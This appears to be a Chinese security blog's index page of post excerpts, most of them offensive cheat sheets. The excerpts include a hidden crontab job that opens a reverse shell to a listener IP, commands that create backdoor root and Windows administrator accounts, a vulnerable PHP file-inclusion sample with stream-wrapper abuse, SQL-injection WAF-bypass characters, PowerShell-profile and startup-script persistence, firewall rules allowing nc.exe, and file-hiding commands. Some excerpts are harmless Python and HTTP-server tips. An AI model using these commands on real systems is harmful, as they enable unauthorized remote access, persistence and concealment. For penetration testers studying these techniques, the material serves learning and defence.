shiyingai's Blog

摘要： 查看防火墙配置 netsh firewall show config 允许指定程序全部连接（Windows Server 2003 系统及之前版本） netsh firewall add allowedprogram c:\nc.exe "allow nc" enable 允许指定程序连入(Wind 阅读全文

摘要： python # python2 python2 -m SimpleHTTPServer 8080 # python3 python3 -m http.server 8080 php php -S 127.0.0.1:8080 阅读全文

摘要： 交换变量值 a, b = 5, 10 a, b = b, a 将列表中所有元素组合成字符串(以空格分隔) a = ["Python", "is", "awesome"] print(" ".join(a)) 查找列表中频率最高的值 a = [1, 2, 3, 1, 2, 3, 2, 2, 4, 5, 阅读全文

摘要： lfi.php案例代码 <?php include $_GET['file']; ?> phar://、zip://、zlib:// 用于读取压缩文件，zip:// 、phart:// 、zlib:// 均属于压缩流，可以访问压缩文件中的子文件，更重要的是不需要指定后缀名，可修改为任意后缀: jpg 阅读全文

摘要： 靶机执行 (crontab -l;printf "* * * * * /bin/bash -c '/bin/sh -i >& /dev/tcp/192.168.79.3/2334 0>&1';\r%100c\n")|crontab - vps监听 nc -lvvp 2334 该计划任务是隐藏的，使用 阅读全文

摘要： 第一种 # guest:123456 useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test 第二种 # t0mcat:123456 per 阅读全文

摘要： 空格字符绕过 %09 TAB建（水平） %0a 新建一行，换行 %0b TAB建（垂直） %0c 新的一页 %0d return 功能 %a0 空格 %00 /**/ /*!*/、/*!50009*/ # 受版本限制 内联执行 浮点数和科学计数法绕过某些WAF NULL值和 \N 绕过某些WAF 引 阅读全文

摘要： 在gpedit.msc上打开组策略，在Windows设置选项上有个脚本（启动/关机）选项 脚本参数可为空 # shell.bat 放在开机自启动目录 net user hack$ 123456 /add && net localgroup administrators hack$ /add 阅读全文

摘要： PowerShell 配置文件是在 PowerShell 启动时运行的脚本。 在某些情况下，攻击者可以通过滥用PowerShell配置文件来获得持久性和提升特权。修改这些配置文件，以包括任意命令，功能，模块和/或PowerShell驱动器来获得持久性。 案例 echo $profile Test-p 阅读全文

摘要： attrib命令 隐藏文件夹或文件 attrib +s +a +h +r test attrib +s +a +h +r 1.php 恢复隐藏的文件 attrib d:\test -h -s /d /s attrib d:\"*" -h -s /d /s 阅读全文